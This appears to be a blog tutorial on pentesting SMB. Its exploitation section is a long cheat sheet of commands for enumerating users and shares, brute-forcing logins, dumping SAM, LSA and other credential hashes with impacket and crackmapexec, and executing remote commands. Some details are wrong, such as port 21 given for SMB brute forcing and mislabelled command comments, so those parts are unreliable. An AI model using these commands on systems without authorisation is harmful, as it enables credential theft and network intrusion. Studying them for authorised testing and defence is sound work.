DevSecOps
Home About Writings Talks Life
DevSecOps

Pentesting Server Message Block (SMB)

SMB (Server Message Block) is a network file and resource sharing protocol initially released in 1984 by IBM for Disk Operating System (DOS) and adapted by Microsoft for Windows systems. Although it has evolved to also include communication via the Samba dialect with Unix based hosts.

SMB enables a set of network services such as file, print, and device sharing. Earlier version of Windows SMB ran on top of the NetBIOS protocol. However, Microsoft changed SMB in later Windows versions to operate on top of TCP/IP protocol using the Common Internet File System (CIFS) dialect. Advancement continued, birthing SMB2, which reduced protocol chattiness, improved performance and opportunistic locking, and SMB3 which increased security and enabled end-to-end encryption. SMB running over NetBIOS relied on ports 137, 138 and 139 while SMB running over TCP/IP it uses port 445.

Let’s now observe the traffic on the wire, see SMB Communication traffic flow.

1
2
3
4
5

# on terminal one
sudo tcpdump -Uni $INTERFACE tcp port 139 or 445    # unbuffered SMB capture filter

# on terminal two
smbclient -L //$IP/ -U '$USERNAME%$PASSWORD'  # login list share content and exit

/images/smb/00_smb-connection.png
SMB Communication

Common Server Application

  • Unix systems
    • Samba
  • Windows systems
    • Microsoft LanmanServer

Common Commands

COMMANDUSAGEDESCRIPTION
cdcdchange directory
del/rmdel/rm $FILENAME*delete or remove specified glob matched files
dir/lsdir/ls $FOLDERNAMElist contents of current or specified directory
getget $FILENAMEget specified file to local directory
helphelplist supported commands
mgetmget *multi get all files in current directory
mkdir/mdmkdir/md $FOLDERNAMEmake specified directory
mputmput $FILENAME*multi put all files current directory to remote share
putput $FILENAMEput specified file into the remote share
quit/exitquit/exitquit or exit the SMB session
rmdir/rdrmdir/rd $FOLDERNAMEremove specified directory

Common Vulnerability

Security Best Practices

  • Deploy latest implementation of SMB.
  • Ensure Authentication, Admission and Authorization are enabled.
  • Enable Firewall or Endpoint protection.
  • Implement VLANs to isolate internal network traffic.

Exploitation
SMB servers are also sink for valueable information. And an attacker could gain a shell on improperly configured servers and tranverse the network. Some inclination of an attacker when an SMB service is encountered includes:

  • What valuable information they can collect from the share.
  • Whether the share is writable with intent to steal NTLM Hash or gain a shell.
  • Which high value users he can harvest their credentials.
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120

## SERVICE ENUMERATION ##
# with nmap
ls /usr/share/nmap/scripts/smb*
'SNIP
/usr/share/nmap/scripts/smb2-capabilities.nse
/usr/share/nmap/scripts/smb2-security-mode.nse
/usr/share/nmap/scripts/smb2-time.nse
/usr/share/nmap/scripts/smb2-vuln-uptime.nse
/usr/share/nmap/scripts/smb-brute.nse
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse
/usr/share/nmap/scripts/smb-enum-domains.nse
/usr/share/nmap/scripts/smb-enum-groups.nse
/usr/share/nmap/scripts/smb-enum-processes.nse
/usr/share/nmap/scripts/smb-enum-services.nse
/usr/share/nmap/scripts/smb-enum-sessions.nse
/usr/share/nmap/scripts/smb-enum-shares.nse
/usr/share/nmap/scripts/smb-enum-users.nse
/usr/share/nmap/scripts/smb-flood.nse
/usr/share/nmap/scripts/smb-ls.nse
/usr/share/nmap/scripts/smb-mbenum.nse
/usr/share/nmap/scripts/smb-os-discovery.nse
/usr/share/nmap/scripts/smb-print-text.nse
/usr/share/nmap/scripts/smb-protocols.nse
/usr/share/nmap/scripts/smb-psexec.nse
/usr/share/nmap/scripts/smb-security-mode.nse
/usr/share/nmap/scripts/smb-server-stats.nse
/usr/share/nmap/scripts/smb-system-info.nse
/usr/share/nmap/scripts/smb-vuln-conficker.nse
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
/usr/share/nmap/scripts/smb-vuln-webexec.nse
/usr/share/nmap/scripts/smb-webexec-exploit.nse
'
nmap -p 139,445 -sV $IP   # show version
nmap -p 139,445 --script smb-protocols $IP    # list supported dialects
nmap -p 139,445 --script 'smb-system-info,smb-os-discovery' $IP    # show host detail
nmap -p 139,445 --script smb*-vuln* $IP    # identify known vulnerabilities
nmap -p 139,445 --script smb2* $IP    # run smb2 scripts
nmap -p 139,445 --script smb-*enum* $IP    # run all smb enum scripts

# with samba utilities
smbclient -NL $IP    # list share unauthenticated
smbclient -U '$USERNAME%$PASSWORD' -L $IP    # list share authenticated
rpcclient -U ''%'' $IP -c 'srvinfo'     # list server info unauthenticated
rpcclient -U '$USERNAME%$PASSWORD' $IP -c 'lsaenumsid'    # show local SIDs
rpcclient -U $USERNAME --password $PASSWORD $IP -c 'querydominfo'     # list domain details
rpcclient -U $USERNAME --password $PASSWORD $IP -c 'enumdomusers'     # list domain users
rpcclient -U $USERNAME --password $PASSWORD -c 'enumprivs'   # list current user privileges

# with enum4linux
enum4linux -o $IP    # show OS details unauthenticated
enum4linux -U $IP    # list users
enum4linux -r -u $USERNAME -p $PASSWORD $IP | grep -v "\\unknown"   # brute force users via SID
enum4linux -dS -u $USERNAME -p $PASSWORD $IP  # list shares and the capabilities 

# with impacket
impacket-psexec $IP -no-pass   # list shares and capablities unauthenticated
impacket-smbexec  $USERNAME:'$PASSWORD'@'$IP' -share $SHAREFOLDERNAME
impacket-lookupsid $USERNAME:'$PASSWORD'@'$DOMAIN'   # list domain users
impacket-netview $DOMAIN/'$USERNAME':'$PASSWORD'@'$IP'

# with smbmap
smbmap -u $USERNAME -p $PASSWORD -H $IP -v   # show OS details   
smbmap -u $USERNAME -p $PASSWORD -H $IP    # list all shares authenticated

# with crackmapexec
cme smb -u $USERNAME -p $PASSWORD $IP --shares    # list all shares authenticated
cme smb -u $USERNAME -p $PASSWORD $IP --users    # list all shares authenticated
cme smb -u $USERNAME -p $PASSWORD $IP -M zerologon    # identify zerologon

## CREDENTIAL ENUMERATION ##
# with hydra
hydra -t 20 -c 1 -L $USERNAMELIST -P $PASSWORDLIST -s 21 smb://$IP -V    # reveal credentials

# with impacket
impacket-samrdump $USERNAME:'$PASSWORD'@'$IP'    # extract hashes from Windows Security Account Manager (SAM)
impacket-secretsdump $USERNAME:'$PASSWORD'@'$IP'    # collect hashes, plaintext credentials and keberos keys

# with smbmap
smbmap -u $USERNAME -p $PASSWORD -H $IP -r $SHAREFOLDERNAME -A '`the filename regex`' # search and download specified pattern filename

# with crackmapexec
cme smb -u $USERNAME -p $PASSWORD $IP --sam     # extract hashes from Windows Security Account Manager (SAM)
cme smb -u $USERNAME -p $PASSWORD $IP --lsa    # extract the local security account keys
cme smb -u $USERNAMELIST -p $PASSWORDLIST $IP    # brute force username/password

# with medusa
medusa -t 2 -T 2 -U $USERNAMELIST -P $PASSWORDLIST -h $IP -n 21 -M smb | grep "SUCCESS"

## PATH ENUMERATION ##
# with smbmap
smbmap -u $USERNAME -p $PASSWORD -H $IP -R $SHAREFOLDERNAME   # list content of specified share
smbmap -u $USERNAME -p $PASSWORD -H $IP -R --exclude $SHAREFOLDERNAMES  # list content of all share excluding specified shares
smbmap -u $USERNAME -p $PASSWORD -H $IP --upload $FILENAME $SHAREFOLDERNAME/$FILENAME   # upload a file to specified share
smbmap -u $USERNAME -p $PASSWORD -H $IP --download $SHAREFOLDERNAME/$FILENAME   # download specified file
smbmap -u $USERNAME -p $PASSWORD -H $IP --delete $SHAREFOLDERNAME/$FILENAME   # delete specified file

# with crackmapexec
cme smb -u $USERNAMELIST -p $PASSWORDLIST $IP -M spider_plus -o OUTPUT=$FOLDERNAME   # crawl all the shares

## HOST ENUMERATION/FOOTPRINTING ##
# with samba utilities
smbclient -U '$USERNAME%$PASSWORD' //$IP/$SHAREFOLDERNAME    # log into specified share 

# with impacket
impacket-smbclient $USERNAME:'$PASSWORD'@'$IP'  # activate an smb prompt
impacket-wmiexec $USERNAME:'$PASSWORD'@'$DOMAIN'

# with smbmap
smbmap -u $USERNAME -p $PASSWORD -H $IP -x $COMMAND  # execute cmd command

# with evil-winrm
evil-winrm -i $IP -u $USERNAME -p $PASSWORD

References